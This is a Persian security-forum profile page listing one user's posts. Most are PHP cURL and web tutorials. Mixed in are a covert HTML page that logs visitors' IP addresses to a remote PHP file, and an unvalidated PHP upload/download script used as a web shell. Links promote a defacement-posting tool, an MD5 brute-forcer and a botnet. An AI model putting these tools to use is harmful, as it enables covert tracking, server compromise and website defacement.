رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

504w

Retired Admin
  • تعداد ارسال ها

    35
  • تاریخ عضویت

  • آخرین بازدید

تمامی مطالب نوشته شده توسط 504w

  1. 504w

    طرحی کنترل پنل با Php

    سلام میتونید از CURL استفاده کنید https://iran-cyber.net/forums/threads/php-curl-lib.2723/
  2. 504w

    راهنمایی برای نوشتن اسکریپت با Php

    سلام برای اینکار میتونین اول با استفاده از مرورگر بصورت دستی ثبت نام کنید و با استفاده از تب نتورک F12 ریکوست رو مشاهده کنید . و طبق این ریکوست میتونین با استفاده از curl ، ریکوست رو شبیه سازی کنید .
  3. سلام برنامه جدیدی نوشتم برای دریافت پراکسی این برنامه پراکسی هارو از سطح نت جمع میکنه قبل از اجرای برنامه ابتدا مرورگر ت*ور رو اجرا کنید روی پورت 9150 بعد برنامه رو اجرا کنید چون سایت ارایه پراکسی بن میکنه بعد ازینکه بن شدید وارد مرورگر ت*ور بشین و New identity رو بزنین تا دوباره فعال بشه <?php set_time_limit(0); function fileget(){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://api.getproxylist.com/proxy"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_PROXY , "socks://127.0.0.1:9150"); curl_setopt($ch, CURLOPT_VERBOSE, true); curl_setopt($ch,CURLOPT_COOKIEFILE,'cookies.txt'); curl_setopt($ch,CURLOPT_COOKIEJAR,'cookies.txt'); curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate'); $headers = array(); $headers[] = "bwsdf"; $headers[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; $headers[] = "Accept-Language: en-US,en;q=0.5"; $headers[] = "Connection: keep-alive"; $headers[] = "Upgrade-Insecure-Requests: 1"; $headers[] = "Cache-Control: max-age=0"; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $result = curl_exec($ch); if (curl_errno($ch)) { echo 'Error:' . curl_error($ch); } curl_close ($ch); return $result; } function get_proxy($count){ $file = fopen("proxy.txt" , "a+"); for($i=0;$i<$count;$i++){ $response = json_decode(fileget("https://api.getproxylist.com/proxy")); if(isset($response->ip)){ fwrite($file , $response->protocol."://".$response->ip.":".$response->port."\n"); }else{ echo "Done !"; break; } } fclose($file); } print_r(get_proxy(20));
  4. 504w

    دریافت ایپی با Html !

    سلام ی فایل html نوشتم که با باز کردنش ایپی رو ارسال میکنه به فایل php تعیین شده تو سورس و php ایپی رو ذخیره میکنه . <!DOCTYPE html> <html> <head> <title>ICG IP Catcher</title> <script src="http://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"> </script> </head> <body> <script type="text/javascript"> $(document).ready(function () { $.getJSON("http://jsonip.com/?callback=?", function (data) { console.log(data); var ip = data.ip; var request = $.ajax({ url: "http://localhost/ip.php", type: "POST", data: {ip : ip}, dataType: "html" }); alert("ایپیت رف داداچ"); }); }); </script> </body> </html> url رو ادیت کنید و بجاش ادرس سورس زیر رو قرار بدین . فایل php ذخیره کردن ip در هاست : <?php foreach ($_REQUEST as $key => $value){ file_put_contents("lastip.txt", $value); } در حقیقت کار اصلی رو js انجام میده !
  5. 504w

    آموزش موتور Rewrite

    سلام امروز میخوام شمارو با موتور Rewrite یا RewriteEngine یا به فارسی موتور بازنویسی ادرس های وب آشنا کنم شاید شما هم دیده باشید ک مثلا برای ثبت نام در سایتی وارد ادرس site.com/register میشین و فرم ثبت نام براتون ب نمایش در میاد ولی همچین فولدری رو سرور وجود نداشته باشه ! یا مثلا در سایت های وردپرسی یا ادرس لینک های کوتاه شده توسط کوتاه کننده های لینک : tinyurl.tiny/tiny این کار رو میتونید توسط این متد در htaccess انجام بدین برای دوباره نویسی لینک ها ب این شکل عمل میکنیم : 1- ساخت فایل htaccess در مسیری ک میخوایم ادرس هارو بازنویسی کنیم 2- شروع کد نویسی : <IfModule mod_rewrite.c> </IfModule> کد های مربوطه بین این دو تگ قرار خواهند گرفت 3- روشن کردن موتور بازنویسی <IfModule mod_rewrite.c> RewriteEngine on </IfModule> 4- نوشتن قوانین: قوانین این متد با عبارت RewriteRule تعیین میشن ب این شکل : <IfModule mod_rewrite.c> RewriteEngine on RewriteRule home /ht/icg.html </IfModule> خب اینجا قانونی تعیین کردیم ک اگر ادرسی ک درخواست میشه شامل کلمه home باشه سرور فایل icg.html رو نشون میده ولی توی ادرس مشخص نمیشه مثلا : ما ی فایل htaccess تو فولدر /ht/ ساختیم site.com/ht/.htaccess و کد بالا رو توش کپی کردیم حالا اگه ادرس های زیر رو درخواست کنیم فایل icg.html ب ما نشون داده میشه site.com/ht/home site.com/ht/mmmhomemmm site.com/ht/homeeeeeee site.com/ht/abchome میشه با Regex شرط هایی هم براش تعیین کرد مثلا از کاراکتر ^ (shift+6) میشه شرط گذاشت تا اگه با کلمه خاصی شروع بشه فایل رو نشون بده . مثلا : RewriteRule ^home /ht/cam.txt حالا اگه ما درخواستی ارسال کنیم ک با کلمه home شروع بشه عمل بازنویسی انجام میشه site.com/ht/homelllll یا علامت $ تعیین میکنه ک با کلمه خاصی تموم بشه خب فک کنم تا اینجا کافی باشه برای اطلاعات بیشتر ی سر ب اینجا بزنین http://httpd.apache.org/docs/2.0/misc/rewriteguide.html اینم ی منبع خوب برای یادگیری regex https://24ways.org/2013/url-rewriting-for-the-fearful/ مثال : <IfModule mod_rewrite.c> RewriteEngine on RewriteRule ^([0-9a-zA-Z-]{1,60})$ /ht/cat.php?cat=$1 [NC] </IfModule> خب ازین کد در کوتاه کننده های لینک استفاده میکنند شرط گذاشته شده ب این شکل هست ک تعیین میکنه با عدد یا حرف بزرگ و کوچک شروع بشه و یک تا 60 کاراکتر داشته باشه و با همینا تموم بشه بعد درخواست رو انتقال میشه ب فایل php ک نوشتم این فایل php هر مقداری رو ک بگیره چاپ میکنه [NC] هم برای نادیده گرفتن کوچک و بزرگی حروف هست اینجا میتونید ببینید : http://fimpmarche.it/ht/irancyber منتقل میشه ب : http://fimpmarche.it/ht/cat.php?cat=irancyber
  6. 504w

    | آموزش توابع Php |

    بخش سوم توابع php موضوع : کار با فایل ها و برخی توابع سیستمی رمز : iran-cyber.net ref.filesystem.rar
  7. 504w

    Php Curl Lib

    سلام تو این پست میخوام اپلود و دانلود فایل بوسیله curl رو اموزش بدم خب اپلود ک راحته و فقط کافیه ادرس فایل رو تو POSTFIELDS قرار بدین مثلا ب این شکل : تو Php از @ برای جلوگیری از نشون دادن ارور های اون لاین استفاده میشه و از تابع error_reporting میتونید همینکارو برای کل اسکریپت انجام داد <?php $c = curl_init('http://example.com/upload.php'); curl_setopt($c, CURLOPT_POST, true); curl_setopt( $c, CURLOPT_POSTFIELDS, array( 'file' => '@' . realpath('example.txt') )); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); echo curl_exec($c); curl_close($c); اما برای دانلود فایل از اپشنی ب نام CUROPT_FILE استفاده میکنیم : مقدار این اپشن مسیر ذخیره فایل دانلودی هست و درخواستی ک باید ارسال بشه ، ب لینک فایلی ک میخوایم دانلود بشه هست اینم ی مثال برای درک بهتر : <?php $ch = curl_init(); $fp = fopen("icsg.html", "w"); curl_setopt($ch, CURLOPT_URL, "http://www.iran-cyber.net/"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); curl_close($ch); fclose($fp);
  8. 504w

    | آموزش توابع Php |

    بخش دوم توابع php موضوع : کار با ارایه ها رمز : iran-cyber.net ref.array.rar
  9. 504w

    Icg-multiple-zone-poster

    سلام با این برنامه شما میتونید وبسایت دیفیس شده تون رو توی چندین زون ثبت کنید بدون اتلاف وقت ! دمو : http://504w.ir/apps/multi-zone-poster.php دانلود : https://github.com/504w/ICG-multiple-zone-poster اینم ی تصویر از برنامه:
  10. 504w

    Icg-md5-brute-tool

    سلام با این برنامه میتونید با دادن پسوردلیست و هش مورد نظر شروع ب کرک کردن اون بکنید نحوه کار : php icg-brute.php <passlist.txt> <hash> تست شده روی کامند لاین ویندوز دانلود : https://github.com/504w/ICG-md5-brute
  11. 504w

    | آموزش توابع Php |

    بخش اول توابع php موضوع : کار با رشته ها رمز : iran-cyber.net ref.strings.rar
  12. 504w

    | آموزش توابع Php |

    سلام قصد دارم اموزش توابع php رو تو این تاپیک شروع کنم این تاپیک بدرد کسایی میخوره ک سینتکس رو یاد گرفتن و میخوان php رو بصورت پیشرفته یاد بگیرن اموزش ها بصورت موضوعی هستن ب ان شکل ک تو هر پست توابعی ک مربوط ب یک موضوع هستن آموزش داده میشن (مثلا توابع کار با فایل هادر یک پست)
  13. اعصاب ایستیر تراختورچی اولماغا
  14. 504w

    Php Curl Lib

    سلام خب ب امید خدا این مبحث هم تموم شد در اخر همه مطالب رو داخل یک کتاب جمع کردم ک پیوست شده و میتونید دانلود کنید برخی مطالب کتاب بیشتر و بهتر توضیح داده شده رمز : iran-cyber.net آموزش کتابخانه curl.rar
  15. 504w

    Icg-uploadboy-link-grabber

    سلام با این برنامه بدون معطلی لینک مستقیم فایل هارو از اپلود بوی دریافت کنید دانلود از گیتهاب : https://github.com/504w/ICG-UploadBoy-Link-Grabber/
  16. 504w

    Theme Color Meta Tag

    شاید برای شما هم پیش اومده باشه ک موقع وبگردی با کروم رنگ هدر اون تغییر کرده باشه مثل تصویر پیوست شده اینکار با استفاده از متا تگ theme-color انجام میشه ب این شکل : <meta name="theme-color" content="#F54F31" />
  17. 504w

    Target Trainings

    http://www.moderncourse.com/webinar.php?cid=41 Sql Injection
  18. 504w

    Php Curl Lib

    سلام امروزم در خدمتتون هستیم با مبحث پراکسی ها در curl برای این کار از اپشن CURLOPT_PROXY استفاده میکنیم مقداری ک میپذیره پراکسی بهمراه پورت و بصورت رشته در داخل " قرار میگیره هر چند میتونین پورت پراکسی رو جدا کنید و با اپشن CURLOPT_PROXYPORT ست کنید ب تکه کد زیر دقت کنید : <?php set_time_limit(0); $url = "http://504w.ir/icg/test2.php"; $proxy = "http://75.109.106.5:37449/"; $c = curl_init(); curl_setopt($c, CURLOPT_URL, $url); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); curl_setopt($c, CURLOPT_PROXY, $proxy); curl_setopt($c, CURLOPT_HEADER, true); curl_setopt($c, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); $res = curl_exec($c); curl_close($c); echo $res; curl_close($c); echo $res; خب من ی اسکریپت گذاشتم رو سایتم ک ایپی نشون بده اگه با پراکسی بزنین ک ایپی خودتونو نشون نمیده عوضش ی ایپی دیگه نشون میده ک مربوط ب پراکسیه خب حالا ی اپشن دیگه هم ک تو کد میبینید CURLOPT_PROXYTYPE هست ک نوع پراکسی رو ست میکنه ما اینجا از sock ver 5 استفاده کردیم خب دیگه فک کم ب انتهای آموزش رسیدیم ازین ب بعد سعی میکنم اسکریپت هارو بررسی کنیم یا اگه چیزی لازم ب گفتن باشه در این مورد همینجا میگم با تشکر .
  19. 504w

    Icg Botnet

    سلام ی بات نت اختصاصی برای تیم نوشتم , امیدوارم خوشتون بیاد این ی برنامه نو پا هست و قطعا مشکلاتی رو بدنبال خواهد داشت شما میتونید با انتقادات و پیشنهادات خودتون مارو همراهی کنید https://github.com/504w/ICG-botnet آموزش استفاده تو فایل readme هست
  20. 504w

    Php Curl Lib

    سلام امروز میخوام ی تابع معرفی کنم ک کارتونو خیلی راحت تر میکنه شما دیگه لازم نیست متناوبا از تابع curl_setopt استفاده کنید بجای اینکار آپشن هارو بصورت ارایه ذخیره میکنید و با این ارایه یجا همرو ست کنید این تابع curl_setopt_array هست ک پارامتر اول متغیر درخواست و پارامتر دوم ارایه ی آپشن ها ب مثال زیر توجه کنید <?php $url = "http://www.iran-cyber.net/"; $c = curl_init(); $opt = array( CURLOPT_URL => $url, CURLOPT_POST => true, CURLOPT_RETURNTRANSFER => false, CURLOPT_HEADER => true, CURLOPT_FOLLOWLOCATION =>false, CURLOPT_NOBODY => true ); curl_setopt_array($c, $opt); $res = curl_exec($c); curl_close($c); * نکته : هنگام ست کردن اپشن ها اونارو بصورت رشته بین " یا ' قرار ندین موند جلسه ست کردن پراکسی ک اونم ایشالا جلسه بعدی بعدش اسکریپت های مختلف رو بررسی میکنیم با تشکر
  21. 504w

    Php Curl Lib

    سلام امروز هم در خدمتتون هستیم با آموزش چنتا اپشن جدید CURLOPT_USERAGENT // baraye tanzime userAgente request UA list => "https://udger.com/resources/ua-list" CURLOPT_USERPWD // baraye login besoorate http auth meghdar be soorate = > "user:pass" masalan ba in mitunid be panel aksare modem ha login konid 192.168.1.1 CURLOPT_SSL_VERIFYPEER // baraye nadide gereftane ssl cert. meghdare true va false migire // false to ignore CURLOPT_TIMEOUT // megdar zamane timeoute request // val => integer CURLOPT_REFERER // request sent from setting // baraye bazi login ha niaz hast اگه کسی پراکسی داره یکی بفرسه بهم برای اموزش میخوام
  22. 504w

    Php Uploader/downloader

    سلام کار خاصی انجام نمیدید ی فایل با فرمت php میسازید و کد رو داخلش کپی میکنید بعد فایلو رو هاست اپلود میکنید و مث ی پیج یا شل اجراش میکنید بعد میتونید فایلی رو داخل هاست اپلود یا از جاهای دیگه دانلود کنید تو هاستتون مثلا لینک دانلود برنامه ای رو بهش میدین و بدون کاهش حجم شما ، برنامه تو هاستتون دانلود میکنه
  23. 504w

    ساخت ربات تلگرام با Php

    سلام تو این تاپیک میخوام ساخت ربات تلگرامی با php ، بصورت webhook رو آموزش بدم امید وارم همراهی کنید اسپم نباشه و سوالی داشتین تو پ.خ
  24. 504w

    Php Uploader/downloader

    سلام با این اسکریپت میتونین فایل اپلود کنین یا فایلی رو از سرور دیگه رو سرور خودتون دانلود کنید بدون کاهش ترافیک اینترنت <html> <head> <title> EST Uploader/Downloader </title> <style type="text/css"> body{ background-color: #000000; } .input1{ width: 70%; height: 30px; margin-bottom: 10px; } .input2{ width: 25%; height: 30px; } .button{ width:150px; height:30px; border:none; background-color: red ; color:#ffffff; transition: 0.25s; } #second{ margin-top: 70px; } label{ color:#ffffff; } p{ color:#ffffff; } .inputfile { color:#ffffff; } h2 , h4 { color: #ffffff; } </style> </head> <body> <h2>Uploader / Downloader</h2> <h4>Coded By 504w</h4> <br /> <p>Download files on server :</p> <div> <form action="<?php $_SERVER['PHP_SELF']; ?>" method="post" enctype="multipart/form-data"> <label for="inpt1">Inter Url:</label> <input type="text" name="url" class="input1" id="inpt1" /> <br /> <label for="inpt2">Inter Name (No need for Extention .php .html) :</label> <input type="text" name="name" id="inpt2" value="icg" class="input2" /> <br /> <br /> <input type="submit" name="sub" class="button" /> </form> </div> <div id="second"> <p>Or Upload Files :</p> <form action="<?php $_SERVER['PHP_SELF']; ?>" method="post" enctype="multipart/form-data"> <input type="file" name="file" class="inputfile" /> <input type="Submit" name="sub2" /> </form> </div> </body> </html> <?php if(isset($_POST['sub'])){ $url = $_POST['url']; $extention = end(explode(".",$url)); $filename = $_POST['name']; $cp = copy($url , "$filename.$extention"); echo '<a href="'. $_SERVER['REQUEST_URI'].$filename.'.'.$extention. '"> Uploaded ! </a>'; } if(isset($_POST['sub2'])){ $file_name = $_FILES['file']['name']; $file_tmp = $_FILES['file']['tmp_name']; move_uploaded_file($file_tmp , $file_name ); echo '<a href="'.$_SERVER['REQUEST_URI'].$file_name.'" > Uploaded ! </a> '; } ?>

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...